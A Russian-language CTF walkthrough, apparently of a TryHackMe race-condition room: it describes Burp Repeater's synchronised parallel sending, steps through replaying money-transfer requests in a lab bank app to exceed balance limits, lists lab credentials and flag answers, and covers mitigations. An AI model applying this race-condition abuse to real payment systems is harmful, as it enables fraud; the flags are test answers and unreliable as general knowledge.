Внимательно изучив скриншот выше, мы видим, что каждый запрос приводил к отправке 12 пакетов; однако в предыдущей попытке (последовательная отправка) каждый запрос требовал всего 10 пакетов. Почему это произошло?

Согласно документации по отправке групповых HTTP-запросов , при параллельной отправке Repeater использует различные методы для синхронизации поступления запросов к целевому объекту, то есть для обеспечения их поступления в течение короткого промежутка времени. Метод синхронизации зависит от используемого HTTP-протокола:

В случае HTTP/2+, ретранслятор пытается отправить всю группу в одном пакете. Другими словами, один TCP- пакет будет содержать несколько запросов.
В случае HTTP/1, Repeater прибегает к синхронизации по последнему байту. Этот приём достигается за счёт удержания последнего байта из каждого запроса. Только после отправки всех пакетов без последнего байта отправляется последний байт всех запросов. На скриншоте ниже показан наш POSTзапрос, отправленный в двух пакетах.

Делаем 100 баксов!

Чтобы получить рейскондитион ( гонку вооружений) с 1 аккаунта отправим 1 доллар на другой

Перехватываем

Отправляем в репитор

Создаем группу

Копируем запросы 100 раз ( но перед этим меняем сумму отправки на 2 доллара)

Получаем в группу 100 запросов по 2 доллара

Отправляем запросы одним коннектом

У нас стало на 2 доллара меньше

авторизуемся под другим пользователем и видим 11 баксов

значит все гуд, возравщаемся и пробуем отправить 100 запросов не в одном коннекте, а в нескольких.

Проверяем от куда списывалось )

а на аккаунте куда отправили видим 79$

но нам же нужна 100$

теперь попробуем работать с числами побольше, переливая деньги туда и сюда.

видим жирный минус -

Вопрос: Чтобы получить флаг, вам нужно иметь на одном из аккаунтов более 100 долларов на счету. Какой флаг вы получили?

Ответ: THM{PHONE-RACE}

6. Выявление и смягчение последствий

Обнаружение

Выявление состояний гонки с точки зрения владельца бизнеса может быть сложной задачей. Если несколько пользователей активировали одну и ту же подарочную карту несколько раз, это, скорее всего, останется незамеченным, если не проверять журналы на наличие определенных действий. Учитывая, что состояния гонки могут использоваться для эксплуатации даже более скрытых уязвимостей, очевидно, что нам нужна помощь специалистов по тестированию на проникновение и охотников за уязвимостями, чтобы попытаться обнаружить такие уязвимости и сообщить о своих находках.

Специалисты по тестированию на проникновение должны понимать, как система ведет себя в нормальных условиях при применении ограничений. К таким ограничениям относятся: однократное использование, однократное голосование, однократная оценка, ограничение баланса и ограничение до одного раза в 5 минут, и другие. Следующим шагом будет попытка обойти это ограничение путем использования состояний гонки. Выявление различных состояний системы может помочь сделать обоснованные предположения о временных окнах, в которых можно использовать состояние гонки. Такие инструменты, как Burp Suite Repeater, могут стать отличной отправной точкой.

Смягчение последствий

Мы перечислим несколько методов смягчения последствий.

Механизмы синхронизации : Современные языки программирования предоставляют механизмы синхронизации, такие как блокировки. Блокировку может получить только один поток одновременно, что предотвращает доступ других потоков к общему ресурсу до тех пор, пока блокировка не будет освобождена.
Атомарные операции : Атомарные операции представляют собой неделимые исполнительные блоки — набор инструкций, сгруппированных вместе и выполняемых без прерывания. Такой подход гарантирует завершение операции без прерывания другим потоком.
Транзакции базы данных : Транзакции объединяют несколько операций с базой данных в один блок. Следовательно, все операции в рамках транзакции либо завершаются успешно, либо завершаются с ошибкой. Такой подход обеспечивает согласованность данных и предотвращает состояния гонки, возникающие при одновременном изменении базы данных несколькими процессами.

7. Соревнования по веб-приложениям

Теперь задача такая:

В этой комнате были представлены состояния гонки и различные ситуации, приводящие к таким уязвимостям. Сложность системы и географическое распространение могут приводить к разнообразным непредвиденным ситуациям, включая уязвимости, связанные с состояниями гонки. Для обнаружения и использования таких состояний крайне важно сначала понаблюдать за поведением системы в нормальных условиях, а затем попытаться выяснить, как она ведет себя при попытке использовать уязвимость по времени. Имеющиеся в настоящее время инструменты предоставляют множество методов для экспериментов.

Испытание

Исходя из полученных знаний, пришло время попытаться обнаружить и использовать состояние гонки без посторонней помощи.

Нажмите кнопку «Запустить машину» справа, чтобы запустить подключенную виртуальную машину . Нажмите кнопку «Запустить AttackBox» вверху, чтобы запустить AttackBox, если вы еще этого не сделали. В AttackBox перейдите по адресу http://MACHINE_IP:5000.

Это учетные данные трех пользователей:

Имя: Рассер Конд

Имя пользователя:4621
Пароль:blueApple

Имя: Заводни Став

Имя пользователя:6282
Пароль:whiteHorse

Имя: Warunki Wyscigu

Имя пользователя:9317
Пароль:greenOrange

у каждого пользователя по 100$

Если мы аввторизуемся видим кнопочки для отправки денег пользователям

Это веб-приложение принадлежит банку и позволяет клиентам переводить деньги онлайн. Для этого необходимо иметь на одном из счетов более 1000 долларов .

Перехватываем через бурп

Создаем группу и 100 запросов

видим что прошло только 4-5 запросов

возможно ещё плюсуется комиссии, стамив еще меньше баланса для отправки, отправляем уже Zavodni Stav

Авторизуеся под Стаф

Вопрос: Какой флаг вы получили после того, как баланс счета превысил 1000 долларов?

Ответ: THM{BANK-RED-FLAG}